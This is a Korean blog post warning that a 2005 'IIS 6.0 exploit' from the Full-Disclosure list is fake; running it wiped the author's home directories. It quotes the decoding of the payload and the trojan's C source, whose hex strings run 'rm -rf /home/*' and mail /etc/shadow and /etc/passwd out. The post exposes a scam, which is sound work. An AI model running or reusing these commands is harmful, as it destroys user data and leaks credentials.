Language
한국어

[사기] iis 6.0 쉘 입수 코드로 속인 페이지

2013.07.25 17:21

suritam9 조회 수:1192

http://seclists.org/fulldisclosure/2005/Apr/451


IIS 6.0의 취약점을 이용해 쉘을 얻을 수 있는 코드라고 해서 TEST 해 봤는데, home 디렉터리만 날렸다.


이런 사기 코드에 당하다니 미치겠다. 쩝.


메일은 가지 않았으나, 사용자 디렉터리가 모두 삭제되어 기분이 나쁘다.


다행이 vmware 에서 실행되서 백업 이미지가 있긴 하지만, 조심해야겠다.


http://lists.grok.org.uk/pipermail/full-disclosure/2005-April/033472.html

THIS ADVISORY IS FALSE!!!!!!!!!!!!!!!!!!!!!!!

"shellcode" is decoded to be:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

"launcher" is decoded to be:
cat /etc/shadow |mail full-disclosure at lists.grok.org.uk

"netcat_shell" is decoded to be:
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk


Day Jay wrote:
> /* Proof of concept code
>    Please don't send us e-mails
>    asking us "how to hack" because
>    we will be forced to skullfsck you.
> 
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> 
>    IIS 6 Buffer Overflow Exploit
> 
>    BUG: inetinfo.exe improperly bound checks
>    http requests sent longer than 6998 chars.
>    Can get messy but enough testing, and we have
>    found a way in.
> 
>    VENDOR STATUS: Notified
>    FIX: In process
> 
>    Remote root.
> 
>    eg.
>    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>     + Connecting to host...
>     + Connected.
>     + Inserting Shellcode...
>     + Done...
>     + Spawining shell..
> 
>     Microsoft Windows XP [Version 5.1.2600]
>    (C) Copyright 1985-2001 Microsoft Corp.
>    C:>
> 
> 
> 
> */
> char shellcode[] =
> "x2fx62x69x6ex2fx72x6dx20"
> "x2dx72x66x20x2fx68x6fx6d"
> "x65x2fx2ax3bx63x6cx65x61"
> "x72x3bx65x63x68x6fx20x62"
> "x6cx34x63x6bx68x34x74x2c"
> "x68x65x68x65";
> 
> char launcher [] =
> "x63x61x74x20x2fx65x74x63x2fx73"
> "x68x61x64x6fx77x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
> 
> char netcat_shell [] =
> "x63x61x74x20x2fx65x74x63x2fx70"
> "x61x73x73x77x64x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
> 
> 
> main()
> {
> 
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
> 
> //int socket = 0;
> //double long port = 0.0;
> 
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> 
>  //     for(int j; j < 30; j++)
>         {
>         //Find socket remote address fault
>         printf(".");
>         }
> //overtake inetinfo here IIS_666666^
> return 0;
> }
> 
> 
> 
> 
> 		
> __________________________________ 
> Do you Yahoo!? 
> Plan great trips with Yahoo! Travel: Now over 17,000 guides!
> http://travel.yahoo.com/p-travelguide
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/